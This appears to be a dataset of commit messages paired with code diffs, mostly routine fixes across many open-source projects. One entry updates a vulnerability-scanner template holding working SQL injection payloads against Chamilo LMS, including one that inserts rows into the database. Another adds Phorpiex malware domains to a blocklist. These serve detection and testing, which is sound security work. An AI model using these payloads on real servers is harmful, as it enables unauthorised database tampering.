message
stringlengths
13
484
diff
stringlengths
38
4.63k
Added required pickle import In commit the method `save_file` was added with a call to `pickle.dump`, while `pickle` is never imported.
@@ -190,6 +190,7 @@ class SentimentAnalyzer(object): """ print("Saving", filename, file=sys.stderr) with open(filename, 'wb') as storage_file: + import pickle # The protocol=2 parameter is for python2 compatibility pickle.dump(content, storage_file, protocol=2)
Fix ForumChannel annotation not working for app_commands Closes
@@ -720,6 +720,7 @@ BUILT_IN_TRANSFORMERS: Dict[Any, Transformer] = { VoiceChannel: BaseChannelTransformer(VoiceChannel), TextChannel: BaseChannelTransformer(TextChannel), CategoryChannel: BaseChannelTransformer(CategoryChannel), + ForumChannel: BaseChannelTransformer(ForumChannel), Attachment: IdentityTransformer(AppCommandOptionType.attachment), }
Remove stale comment from json_serialization_test.py has been fixed and the following code snippet now works as expected. ```python >>> import cirq, sympy >>> circuit = cirq.Circuit(cirq.rx(sympy.Symbol('theta')).on(cirq.NamedQubit("q"))) >>> cirq.testing.assert_json_roundtrip_works(circuit) # works. ```
@@ -265,12 +265,6 @@ def test_fail_to_resolve(): QUBITS = cirq.LineQubit.range(5) Q0, Q1, Q2, Q3, Q4 = QUBITS -# TODO: Include cirq.rx in the Circuit test case file. -# Github issue: https://github.com/quantumlib/Cirq/issues/2014 -# Note that even the following doesn't work because theta gets -# multiplied by 1/pi: -# cirq.Circuit(cirq.rx(sympy.Symbol('theta')).on(Q0)), - ### MODULE CONSISTENCY tests
Updating check-admin.js middleware Implementing solution suggested in the comments of issue
-export default function({ store, route, redirect }) { +export default async function({ app, store, route, redirect }) { + if (store.getters['projects/isEmpty']) { + await store.dispatch('projects/setCurrentProject', route.params.id) + } const role = store.getters['projects/getCurrentUserRole'] - const projectRoot = '/projects/' + route.params.id + const projectRoot = app.localePath('/projects/' + route.params.id) const path = route.fullPath.replace(/\/$/g, '') if (!role.is_project_admin && path !== projectRoot) { return redirect(projectRoot)
Update CHANGELOG.md Updated the descriptions
## [Unreleased] - - Fix for query using custom-field-data. - - In ad-create-contact command, display-name argument now works as expected. - - Added detailed description for filter argument in ad-search command. - - Fixed the example value for custom-attribute argument description in ad-create-user and ad-create-contact commands. + - Fix an issue in the ***custom-field-data*** argument. + - Fixed an issue in the ***ad-create-contact*** command. + - Improved description of the ***filter*** argument in the ***ad-search*** command. + - Fixed the example value description for the ***custom-attribute*** argument in the ***ad-create-user*** and ***ad-create-contact*** commands. ## [19.8.0] - 2019-08-06
Remove from CODEOWNERS This is so that I don't get one new notification per Pull Request.
# These owners will be the default owners for everything in # the repo. Unless a later match takes precedence, -* @dlstadther @Tarrasch @spotify/dataex +* @dlstadther @spotify/dataex # Specific files, directories, paths, or file types can be # assigned more specificially.
Correct pretty-printing of exponents in nth-root notation Closes diofant/diofant#888 Tests were adapted from diofant/diofant#889
@@ -1292,12 +1292,12 @@ def _print_nth_root(self, base, expt): _zZ = xobj('/', 1) rootsign = xobj('\\', 1) + _zZ # Make exponent number to put above it - if isinstance(expt, Rational): + if expt.is_Rational: exp = str(expt.denominator) if exp == '2': exp = '' else: - exp = str(expt.args[0]) + exp = str(self._print(expt.args[0])) exp = exp.ljust(2) if len(exp) > 2: rootsign = ' '*(len(exp) - 2) + rootsign
Fix typo in test for separate_spins Accidentally read a vasprun with Eigenval parser
@@ -711,7 +711,7 @@ class VasprunTest(PymatgenTest): self.assertEqual(vasprun.eigenvalues[Spin.up].shape[0], len(vasprun.actual_kpoints)) def test_eigenvalue_band_properties_separate_spins(self): - eig = Eigenval(self.TEST_FILES_DIR / "vasprun_eig_separate_spins.xml.gz", separate_spins=True) + eig = Vasprun(self.TEST_FILES_DIR / "vasprun_eig_separate_spins.xml.gz", separate_spins=True) props = eig.eigenvalue_band_properties self.assertAlmostEqual(props[0][0], 2.8772, places=4) self.assertAlmostEqual(props[0][1], 1.2810, places=4)
travis.yml: don't restrict pip version The hotfix implemented in to fix broken builds after the release of pip 20.0 seems to be unnecessary after the release of pip 20.0.1.
@@ -21,7 +21,7 @@ addons: update: true install: - - pip install --upgrade "pip<20.0" setuptools wheel + - pip install --upgrade pip setuptools wheel - pip install -q -r dev-requirements.txt - pip install -q -r requirements.txt
Update DOCKER_README.md * Update DOCKER_README.md Fix typo in the docker name * Update DOCKER_README.md
@@ -85,9 +85,9 @@ If you don't have `Docker Compose` you can also use `Docker` directly to run the Here is the commands to run: ```bash -docker pull ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker pull ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z -docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z ``` Be sure to replace `X.Y.Z` with the version you want to pull and run. @@ -122,7 +122,7 @@ docker compose run poetry Or run `Docker` directly: ```bash -docker run -v ~/.openbb_terminal:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env DISPLAY=host.docker.internal:0.0 ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker run -v ~/.openbb_terminal:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env DISPLAY=host.docker.internal:0.0 ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z ``` ### X-Server on macOS @@ -150,8 +150,8 @@ xhost + $IP Now we can run the docker container, adding the display to the environment: -```bach -docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env-file=path/to/setenv --env DISPLAY=$IP:0 ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +```bash +docker run -v ~/.openbb_terminal/:/home/python/.openbb_terminal -v ~/OpenBBUserData:/home/python/OpenBBUserData -it --rm --env-file=path/to/setenv --env DISPLAY=$IP:0 ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z ``` This container will be able to display all the same plots as the terminal interface. @@ -174,7 +174,7 @@ And run the following commands. ```bash xhost +local: -docker run -it --rm --name openbb --env-file=./.env -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix ghcr.io/openbb-finance/openbbterminal/poetry:X.Y.Z +docker run -it --rm --name openbb --env-file=./.env -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix ghcr.io/openbb-finance/openbbterminal-poetry:X.Y.Z xhost -local: ```
flesh out readiness probes to make sure the pod serving traffic asap Add documentation, and optimize to get probes passing and failing as quickly as possible
@@ -32,12 +32,21 @@ spec: periodSeconds: 5 ports: - containerPort: {{ .Values.studioApp.appPort }} + # readiness probes are checks for when the pod is ready to serve traffic. + # Note that this runs even after a pod is Ready. Reaching the failure threshold + # means the pod is taken off the routing rules, but then once it's passing + # queries, it's allowed to serve traffic once more. readinessProbe: httpGet: - path: / - port: {{ .Values.studioNginx.port }} - initialDelaySeconds: 10 - periodSeconds: 5 + path: /healthz + port: {{ .Values.studioApp.appPort }} + # start pinging for readiness at the 5 second mark. + # Once it passes, add it to the routing table + initialDelaySeconds: 5 + # Query every 2 seconds for readiness + periodSeconds: 2 + # fail 3 times before taking this app off the routing table + failureThreshold: 3 volumeMounts: - mountPath: /app/contentworkshop_static/ name: staticfiles
Skip 'error.failure' files They tend to be unreadable
@@ -55,6 +55,10 @@ class NpzGeneratorDataset(object): if self.file_extension not in filename or filename[0] == '.': continue + # Don't load error failures -- they're bad files + if 'error.failure' in filename: + continue + if success_only and 'success' not in filename: continue
Update backend/main/chapters/c09_combining_booleans.py committed suggestion on line 184
@@ -181,7 +181,7 @@ Try inspecting the code with Bird's Eye. Inspect the `return` statements of each class AnExercise(ExerciseStep): """ -When we inspect it with Birdseye, we can see that: +When we inspect it with Bird's Eye, we can see that: name == "Alice" or "Bob"
fix deploy for freebsd HG-- branch : feature/microservices
@@ -37,7 +37,7 @@ stderr_logfile = {{noc_logs}}/{{ services[srv].process_name | default("%(program stderr_logfile_maxbytes = {{ services[srv].stderr_logfile_maxbytes | default('10MB', True)}} stderr_logfile_backups = {{ services[srv].stderr_logfile_backups | default(3, True)}} stderr_events_enabled = false -environment=NOC_CONFIG="{{config_order}}"{% if not 'global' in p -%},NOC_POOL="{{ p }}"{% endif %},NOC_DC="{{ noc_dc }}",NOC_NODE="{{ ansible_nodename }}",NOC_USER="{{ noc_user }}",NOC_ROOT="{{ noc_root }}",NOC_ENV="{{ noc_env }}",NOC_LOGLEVEL="{{noc_config.config[service].loglevel }}",LD_PRELOAD={% if jemalloc_path %}"{{ jemalloc_path }}"{% endif %} +environment=NOC_CONFIG="{{config_order}}"{% if not 'global' in p -%},NOC_POOL="{{ p }}"{% endif %},NOC_DC="{{ noc_dc }}",NOC_NODE="{{ ansible_nodename }}",NOC_USER="{{ noc_user }}",NOC_ROOT="{{ noc_root }}",NOC_ENV="{{ noc_env }}",NOC_LOGLEVEL="{{noc_config.config[service].loglevel }}",LD_PRELOAD={% if not 'FreeBSD' in ansible_system and jemalloc_path %}"{{ jemalloc_path }}"{% endif %} {% endif %} {% endif %}
[metrics] Missing aggregation for node state The query was missing a group by, causing duplicate time series of the same legend if Ray restarts.
@@ -295,15 +295,15 @@ GRAFANA_PANELS = [ unit="nodes", targets=[ Target( - expr="ray_cluster_active_nodes{{{global_filters}}}", + expr="sum(ray_cluster_active_nodes{{{global_filters}}}) by (node_type)", legend="Active Nodes: {{node_type}}", ), Target( - expr="ray_cluster_failed_nodes{{{global_filters}}}", + expr="sum(ray_cluster_failed_nodes{{{global_filters}}}) by (node_type)", legend="Failed Nodes: {{node_type}}", ), Target( - expr="ray_cluster_pending_nodes{{{global_filters}}}", + expr="sum(ray_cluster_pending_nodes{{{global_filters}}}) by (node_type)", legend="Pending Nodes: {{node_type}}", ), ],
Update phorpiex.txt From ```nemucod```
@@ -663,6 +663,40 @@ xieieieros.su xiheiufisd.su xniaeninie.su + + +# Reference: https://app.any.run/tasks/9e581c45-0809-4dd8-8007-cda84b7079a2/ + +aefoahefuaehfu.su +aefoheaofefhuu.su +aeifuaeiuafbuu.su +aeigaeizfaizef.su +aeubaefefbuuss.su +afueufuefueifo.su +aufheuafoaheuf.su +babfaehfuehfuh.su +baeiaeueauieis.su +bafbeiahighgii.su +bbfaeuuhfiaehf.su +bsigsifrruhhgd.su +buieubfiuebuuf.su +eaueaoeufuufhs.su +eauebfuiaefubg.su +egubeauefaeufu.su +faeuhoaoiehrhd.su +fafhoafouehfuh.su +gauehfeohfefhu.su +giaeijeidgieua.su +ibufhhuofouaes.su +koksfegkosoefh.su +lopiaoeufgaeid.su +oefheahfueghuh.su +oehfeoaufhuufs.su +shufourfhrufhu.su +srgbsuirbfubuf.su +tookddiwijdiss.su +uefuaebfauoeug.su + # Generic /t.php?new=1
Accommodate missing symlink targets in Guild view Was failing with an error.
@@ -197,8 +197,7 @@ class ViewDataImpl(view.ViewData): iconTooltip = "Link" return typeDesc, icon, iconTooltip, viewer - @staticmethod - def _base_file_type_info(path): + def _base_file_type_info(self, path): path_lower = path.lower() if re.search(r"\.tfevents\.", path_lower): return "Event log", "file-chart", "File", None @@ -233,9 +232,14 @@ class ViewDataImpl(view.ViewData): elif re.search(r"\.(csv|tsv)", path_lower): return "Table", "file-delimited", "Delimited", "table" else: + return self._default_file_type_info(path) + + @staticmethod + def _default_file_type_info(path): + if not os.path.exists(path): + return "File", "file", "File", None if util.is_text_file(path): return "Text file", "file-document", "Text file", "text" - else: return "File", "file", "File", None def _op_source_info(self, path):
ci: include optional merge commit number in commit check job Also add capturing group for message body.
@@ -187,7 +187,7 @@ jobs: uses: gsactions/commit-message-checker@v1 with: pattern: | - ^(.*):\s*(.*)\s\(PROJQUAY-[0-9]+\)(\n.*)*$ + ^(.*):\s*(.*)\s(\(PROJQUAY-[0-9]+\))(\s\(#[0-9]+\))?\n(\n(\n|.)*)?$ error: 'Commit must begin with <scope>: <subject> (PROJQUAY-####)' flags: 'gm' excludeTitle: true
Fix wrong behavior of Detection Transform Function.(#959) Consider the difference of the division operator between Python 2.x and Python 3.x.
@@ -91,8 +91,8 @@ class GeneralizedRCNNTransform(nn.Module): stride = size_divisible max_size = list(max_size) - max_size[1] = int(math.ceil(max_size[1] / stride) * stride) - max_size[2] = int(math.ceil(max_size[2] / stride) * stride) + max_size[1] = int(math.ceil(float(max_size[1]) / stride) * stride) + max_size[2] = int(math.ceil(float(max_size[2]) / stride) * stride) max_size = tuple(max_size) batch_shape = (len(images),) + max_size
Update README.md Added citation and minor edits
@@ -27,7 +27,7 @@ The techniques include, but are not limited to: - Pruning - Quantization -- Pruning + Quantization +- Pruning and Quantization - Sparse Transfer Learning ## Installation @@ -62,7 +62,7 @@ The following table lays out the root-level files and folders along with a descr | Folder/File Name | Description | |----------------------|-----------------------------------------------------------------------------------------------------------------------| | recipes | Typical recipes for sparsifying YOLOv5 models along with any downloaded recipes from the SparseZoo. | -| yolact | Integration repository folder used to train and sparsify YOLACT models (setup_integration.sh must run first). | +| yolact | Integration repository folder used to train and sparsify YOLACT models (`setup_integration.sh` must run first). | | README.md | Readme file. | | setup_integration.sh | Setup file for the integration run from the command line. | @@ -75,7 +75,7 @@ The export process is modified such that the quantized and pruned models are corrected and folded properly. For example, the following command can be run from within the Neural Magic's -yolact repository folder to export a trained/sparsified model's checkpoint: +`yolact` repository folder to export a trained/sparsified model's checkpoint: ```bash python export.py --checkpoint ./quantized-yolact/yolact_darknet53_0_10.pth \ --recipe ./recipes/yolact.quantized.md \ @@ -85,7 +85,7 @@ python export.py --checkpoint ./quantized-yolact/yolact_darknet53_0_10.pth \ --config yolact_darknet53_config ``` -To prevent conversion of a QAT(Quantization Aware Training) Graph to a +To prevent conversion of a QAT (Quantization-Aware Training) Graph to a Quantized Graph, pass in the `--no-qat` flag: ```bash @@ -100,6 +100,16 @@ python export.py --checkpoint ./quantized-yolact/yolact_darknet53_0_10.pth \ ### DeepSparse -The [DeepSparse](https://github.com/neuralmagic/deepsparse) Engine accepts ONNX +The [DeepSparse Engine](https://github.com/neuralmagic/deepsparse) accepts ONNX formats and is engineered to significantly speed up inference on CPUs for the sparsified models from this integration. [Example](https://github.com/neuralmagic/deepsparse/tree/main/examples/yolact) scripts can be found in the DeepSparse repository. + +## Citation +```bibtex +@inproceedings{yolact-iccv2019, + author = {Daniel Bolya and Chong Zhou and Fanyi Xiao and Yong Jae Lee}, + title = {YOLACT: {Real-time} Instance Segmentation}, + booktitle = {ICCV}, + year = {2019}, +} +```
Disable flaky test_debug_info Summary: Pull Request resolved: Test Plan: Imported from OSS
@@ -1302,6 +1302,7 @@ class RpcTest(RpcAgentTestFixture): rpc.shutdown(graceful=False) @dist_init + @unittest.skip("Test is flaky. see https://github.com/pytorch/pytorch/issues/31846") def test_debug_info(self): # only test keys in this test case. Values should be covered by # individual module debug info tests
Add a separate build matrix entry for documentation testing. * Add a separate build matrix entry for documentation testing. This way we parallelize the unit tests with the documentation tests.
@@ -9,6 +9,11 @@ python: env: - JAX_ENABLE_X64=0 JAX_NUM_GENERATED_CASES=25 - JAX_ENABLE_X64=1 JAX_NUM_GENERATED_CASES=25 +matrix: + include: + - python: "3.7" + env: JAX_ENABLE_X64=1 JAX_ONLY_DOCUMENTATION=true + before_install: - if [[ "$TRAVIS_PYTHON_VERSION" == "2.7" ]]; then wget https://repo.continuum.io/miniconda/Miniconda2-latest-Linux-x86_64.sh -O miniconda.sh; @@ -24,10 +29,13 @@ install: - pip install jaxlib - pip install -v . # The following are needed to test the Colab notebooks and the documentation building - - conda install --yes -c conda-forge pandoc ipykernel - - conda install --yes sphinx sphinx_rtd_theme nbsphinx jupyter_client matplotlib + - if [[ "$JAX_ONLY_DOCUMENTATION" != "" ]]; then + conda install --yes -c conda-forge pandoc ipykernel; + conda install --yes sphinx sphinx_rtd_theme nbsphinx jupyter_client matplotlib; + fi script: - - pytest -n 1 tests examples -W ignore - - if [[ "$TRAVIS_PYTHON_VERSION" > "3" ]]; then - sphinx-build -M html docs build; + - if [[ "$JAX_ONLY_DOCUMENTATION" == "" ]]; then + pytest -n 1 tests examples -W ignore ; + else + sphinx-build -b html -D nbsphinx_execute=always docs docs/build/html; fi
Updated chamilo-lms-sqli.yaml Uses SQL injection to insert data into the database, then checks to see if this data has been added;
id: chamilo-lms-sqli - info: author: undefl0w name: Chamilo LMS SQL Injection severity: high description: Finds sql injection in Chamilo version 1.11.14 - tags: chamilo,sqli - + tags: 'chamilo,sqli' requests: - raw: - - | - POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 + - > + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags + HTTP/1.1 + + Host: {{Hostname}} + + Content-Type: application/x-www-form-urlencoded + + + "type=image&field_id=image&tag=image&from=image&search=image&options=["test'); + INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, + 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES + (16, 16,'pwn'); INSERT INTO extra_field_options(option_value) VALUES + ('pwn'); INSERT INTO tag(id,tag,field_id ) VALUES (16,'pwn',16); -- + "]" + - > + POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags + HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - type=image&field_id=image&tag=image&from=image&search=image&options=["test'); SELECT SLEEP(1.5); -- "] + type=image&field_id=image&tag=image&from=image&search=image&options=["notthetag') + or 1=1 -- "] matchers: - - type: dsl - dsl: - - 'duration>=2' + - type: word + words: + - pwn
framework: Initialize $testSummary for exceptions $testSummary wasn't initialized when a test exception occured. This meant that a previously set $testSummary variable was passed to an aborted test.
@@ -202,10 +202,10 @@ Function Run-TestsOnCycle ([string] $cycleName, [xml] $xmlConfig, [string] $Dist $junitReport.StartLogTestCase("LISAv2Test","$currentTestName","$($testCycle.cycleName)") Set-Variable -Name currentTestData -Value $currentTestData -Scope Global - try { - $testResult = @() + $testResult = "" + $testSummary = "" Write-LogInfo "~~~~~~~~~~~~~~~TEST STARTED : $currentTestName~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" - + try { $CurrentTestResult = Run-Test -CurrentTestData $currentTestData -XmlConfig $xmlConfig ` -Distro $Distro -LogDir $CurrentTestLogDir -VMUser $user -VMPassword $password ` -ExecuteSetup $shouldRunSetupForIteration -ExecuteTeardown $shouldRunTeardownForIteration
Deseasonify: `pop` from remaining icons rather than unpack This should be more readable.
@@ -357,7 +357,7 @@ class BrandingManager(commands.Cog): log.info("Reset & shuffle remaining icons") await self._reset_remaining_icons() - next_up, *self.remaining_icons = self.remaining_icons + next_up = self.remaining_icons.pop(0) success = await self.bot.set_icon(next_up.download_url) return success
Update batch_beam_search_online_sim.py typo: The exxtended hypothesis -> The extended hypothesis
@@ -260,7 +260,7 @@ class BatchBeamSearchOnlineSim(BatchBeamSearch): hyps (Hypothesis): Current list of hypothesis Returns: - Hypothesis: The exxtended hypothesis + Hypothesis: The extended hypothesis """ for k, d in self.scorers.items():
Update ci_chemistry_psi4.yml psi4 conda support for python 3.7 stopped
@@ -16,7 +16,7 @@ jobs: runs-on: ubuntu-latest strategy: matrix: - python-version: [3.7] + python-version: [3.8] steps: - uses: actions/checkout@v2 @@ -50,7 +50,7 @@ jobs: source $HOME/.bashrc source $CONDABASE/bin/activate conda activate test_psi4 - conda install psi4 -c psi4 + conda install psi4 python=3.8 -c psi4 python -m pip install --upgrade pip python -m pip install -r requirements.txt python -m pip install -e .
Prevent job kind filenames from getting too long Many filesystems can't handle path components longer than 256 characters. This should fix
@@ -355,7 +355,7 @@ class FileJobStore(AbstractJobStore): def _supportsUrl(cls, url, export=False): return url.scheme.lower() == 'file' - def _makeStringFilenameSafe(self, arbitraryString): + def _makeStringFilenameSafe(self, arbitraryString, maxLength=240): """ Given an arbitrary string, produce a filename-safe though not necessarily unique string based on it. @@ -364,6 +364,9 @@ class FileJobStore(AbstractJobStore): other nonempty filename-safe string. :param str arbitraryString: An arbitrary string + :param int maxLength: Maximum length of the result, to keep it plus + any prefix or suffix under the filesystem's + path component length limit :return: A filename-safe string """ @@ -378,8 +381,8 @@ class FileJobStore(AbstractJobStore): if len(parts) == 0: parts.append("UNPRINTABLE") - # Glue it all together - return '_'.join(parts) + # Glue it all together, and truncate to length + return '_'.join(parts)[:maxLength] def writeFile(self, localFilePath, jobStoreID=None, cleanup=False): absPath = self._getUniqueFilePath(localFilePath, jobStoreID, cleanup)
[Migrations] Filter to select migration scripts Added a filter to run only specific migration scripts using a glob expression. This is especially useful for development purposes when testing a new script.
@@ -15,9 +15,10 @@ import argparse import asyncio import importlib.util import logging -import os import sys +from pathlib import Path from types import ModuleType +from typing import Iterable, Optional from configmanager import Config @@ -61,6 +62,14 @@ def cli_parse() -> argparse.Namespace: type=str, help="Path to the private key file, if any. Only used to upgrade the key to the latest format.", ) + parser.add_argument( + "--filter-scripts", + action="store", + required=False, + type=str, + help="A filter for migration scripts. If specified, only the files " + "matching the provided glob expression will be run.", + ) parser.add_argument( "--verbose", "-v", @@ -94,6 +103,18 @@ def import_module_from_path(path: str) -> ModuleType: return migration_module +def list_migration_scripts( + migrations_dir: Path, glob_expression: Optional[str] +) -> Iterable[Path]: + migration_scripts = set(migrations_dir.glob("*.py")) + if glob_expression: + migration_scripts = migration_scripts & set( + migrations_dir.glob(glob_expression) + ) + + return migration_scripts + + async def main(args: argparse.Namespace): log_level = logging.DEBUG if args.verbose else logging.INFO setup_logging(log_level) @@ -102,16 +123,16 @@ async def main(args: argparse.Namespace): config = init_config(args.config) init_db_globals(config=config) - migration_scripts_dir = os.path.join(os.path.dirname(__file__), "scripts") + migration_scripts_dir = Path(__file__).parent / "scripts" migration_scripts = sorted( - f for f in os.listdir(migration_scripts_dir) if f.endswith(".py") + list_migration_scripts(migration_scripts_dir, args.filter_scripts) ) command = args.command for migration_script in migration_scripts: - migration_script_path = os.path.join(migration_scripts_dir, migration_script) - migration_module = import_module_from_path(migration_script_path) + migration_script_path = migration_scripts_dir / migration_script + migration_module = import_module_from_path(str(migration_script_path)) if args.verbose: LOGGER.info(f"%s: %s", migration_script, migration_module.__doc__)
Dev Requirements add a comment about pinned requirements
@@ -18,7 +18,7 @@ bash scripts/install_gradio.sh ### To install the local development version of Gradio -* Navigate to the repo folder and install test requirements +* Navigate to the repo folder and install test requirements (note that it is highly recommended to use a virtual environment since the versions are pinned) ``` bash scripts/install_test_requirements.sh
DOC: Cleanup setuptools_scm version on readthedocs setuptools_scm versions dirty commits different from versioneer. It postpends a dot-date eg '.2022060'.
@@ -93,7 +93,7 @@ finally: # 2. remove the 0.0 version created by setuptools_scm when clone is too shallow if on_rtd: import re - p1 = re.compile(r'\+dirty$') + p1 = re.compile(r'\.d\d{8}$') if p1.match(version): version = p1.sub('', version)
Barf when module not found, without breaking hot reloading Summary: Test Plan: Manual Reviewers: schrockn, natekupp
@@ -52,7 +52,13 @@ observer.schedule(handler, '.', True) observer.start() try: + # We want to let the AutoRestartTrick do its thing (stopping dagit and restarting it on every + # observed filesystem change) until either a user interrupts it or dagit exits on its own. while True: + # handler.process is None during an auto restart, so we keep looping; otherwise we check + # to see whether the dagit process has exited. + if handler.process and handler.process.poll(): + raise KeyboardInterrupt() time.sleep(1) except KeyboardInterrupt: handler.stop()
Adds a min-magnitude threshold to ChoiEigenvalueBarPlot. Avoids plotting O(1e-13) "zero" eigenvalues as red or gray bars on these plots (in ptic for target gates).
@@ -2089,10 +2089,11 @@ class ChoiEigenvalueBarPlot(WorkspacePlot): hoverinfo='text' ) + LOWER_LOG_THRESHOLD = -6 #so don't plot all the way down to, e.g., 1e-13 ys = _np.clip(ys, 1e-30, 1e100) #to avoid log(0) errors log_ys = _np.log10(_np.array(ys,'d')) - minlog = _np.floor(min(log_ys)) - maxlog = _np.ceil(max(log_ys)) + minlog = max( _np.floor(min(log_ys)), LOWER_LOG_THRESHOLD) + maxlog = max(_np.ceil(max(log_ys)), minlog+1) #Set plot size and margins
Fix db cluster status check, allow more replicas * There can be more replicas the master has than the number of db nodes in our db_nodes table. * A customer can have an extra node replicating from the cluster. For example in geo repl use case.
@@ -384,7 +384,7 @@ def _get_db_cluster_status(db_service, expected_nodes_number): if not sync_replica: return ServiceStatus.FAIL - if (len(master_replications_state) != expected_nodes_number - 1 or + if (len(master_replications_state) < expected_nodes_number - 1 or not all_replicas_streaming): return ServiceStatus.DEGRADED
MPI->mpi typo
@@ -71,7 +71,7 @@ expressions. Examples of how to define operators are provided: `examples/seismic/tutorials`. * A set of tutorial notebooks concerning the Devito compiler can be found in `examples/compiler`. -* Devito with MPI can be explored in `examples/MPI`. +* Devito with MPI can be explored in `examples/mpi`. * Example implementations of acoustic forward, adjoint, gradient and born operators for use in full-waveform inversion (FWI) methods can be found in `examples/seismic/acoustic`.
Update cd.rst typo fix: "dpeloyment" -> "deployment"
@@ -254,5 +254,5 @@ creating your secret in Secrets Manager. GithubRepoName=repo-name \ --capabilities CAPABILITY_IAM -We've now created a dpeloyment pipeline that will automatically deploy our +We've now created a deployment pipeline that will automatically deploy our Chalice app whenever we push to our GitHub repository.
Relax field requirements when intending to Remove... Fixe issue Make the explainer link, i2i link, doc link, and spec link fields optional for features in the "Remove" intent stage.
@@ -83,7 +83,7 @@ const FORM_FIELD_GRAPH = { INTENT_EXPERIMENT: VISIBLE_OPTIONAL, INTENT_EXTEND_TRIAL: VISIBLE_OPTIONAL, INTENT_IMPLEMENT_SHIP: HIDDEN, - INTENT_SHIP: VISIBLE_OPTIONAL, + INTENT_SHIP: VISIBLE_REQUIRED, INTENT_REMOVE: VISIBLE_OPTIONAL, }, 'explainer_links': { @@ -93,7 +93,7 @@ const FORM_FIELD_GRAPH = { INTENT_EXTEND_TRIAL: HIDDEN, INTENT_IMPLEMENT_SHIP: VISIBLE_REQUIRED, INTENT_SHIP: VISIBLE_REQUIRED, - INTENT_REMOVE: VISIBLE_REQUIRED, + INTENT_REMOVE: VISIBLE_OPTIONAL, }, 'doc_links': { INTENT_NONE: VISIBLE_OPTIONAL, @@ -102,7 +102,7 @@ const FORM_FIELD_GRAPH = { INTENT_EXTEND_TRIAL: HIDDEN, INTENT_IMPLEMENT_SHIP: VISIBLE_REQUIRED, INTENT_SHIP: HIDDEN, - INTENT_REMOVE: VISIBLE_REQUIRED, + INTENT_REMOVE: VISIBLE_OPTIONAL, }, 'spec_link': { INTENT_NONE: VISIBLE_OPTIONAL, @@ -111,7 +111,7 @@ const FORM_FIELD_GRAPH = { INTENT_EXTEND_TRIAL: VISIBLE_OPTIONAL, INTENT_IMPLEMENT_SHIP: VISIBLE_REQUIRED, INTENT_SHIP: VISIBLE_REQUIRED, - INTENT_REMOVE: VISIBLE_REQUIRED, + INTENT_REMOVE: VISIBLE_OPTIONAL, }, 'standardization': { INTENT_NONE: VISIBLE_OPTIONAL,
astnode_types_ada.mako: minor reformatting TN:
% if logic_vars: procedure Assign_Names_To_Logic_Vars_Impl (Node : access ${type_name}); - -- Debug helper: Assign names to every logical variable in the root node, - -- so that we can trace logical variables. + -- Debug helper: Assign names to every logical variable in the root + -- node, so that we can trace logical variables. % endif ## Public field getters % if cls.env_spec.adds_env: overriding function Node_Env (Node : access ${type_name}; - E_Info : Entity_Info := No_Entity_Info) return AST_Envs.Lexical_Env; + E_Info : Entity_Info := No_Entity_Info) + return AST_Envs.Lexical_Env; % endif % endif % endif % if logic_vars: - procedure Assign_Names_To_Logic_Vars_Impl - (Node : access ${type_name}) - is + procedure Assign_Names_To_Logic_Vars_Impl (Node : access ${type_name}) is begin % for f in logic_vars: Node.${f.name}.Dbg_Name := -- Initial_Env_Getter_Fn -- --------------------------- - function ${env_getter} (E : Entity) return AST_Envs.Lexical_Env - is + function ${env_getter} (E : Entity) return AST_Envs.Lexical_Env is Self : constant ${cls.name} := ${cls.name} (E.El); ## Define this constant so that the expressions below, which are expanded
fix -O / PYTHONOPTIMIZE bug fixes I'm not sure how to write test cases for PYTHONOPTIMIZE=1 (without growing our whole test matrix), so I'm leaving this untested...
@@ -898,7 +898,8 @@ def tracers_to_jaxpr( def newvar(t: JaxprTracer) -> Var: var = gensym(type_substitute(t.aval)) - assert t_to_var.setdefault(id(t), var) is var + var_ = t_to_var.setdefault(id(t), var) + assert var is var_ return var def type_substitute(aval: AbstractValue) -> AbstractValue:
added message before logged values # Conflicts: # pype/plugins/global/publish/integrate_new.py
@@ -812,7 +812,9 @@ class IntegrateAssetNew(pyblish.api.InstancePlugin): matching_profiles = {} highest_value = -1 - self.log.info(self.template_name_profiles) + self.log.debug( + "Template name profiles:\n{}".format(self.template_name_profiles) + ) for name, filters in self.template_name_profiles.items(): value = 0 families = filters.get("families")
Fix a servicemanager race condition. We can't call 'cleanup' from two different threads at the same time.
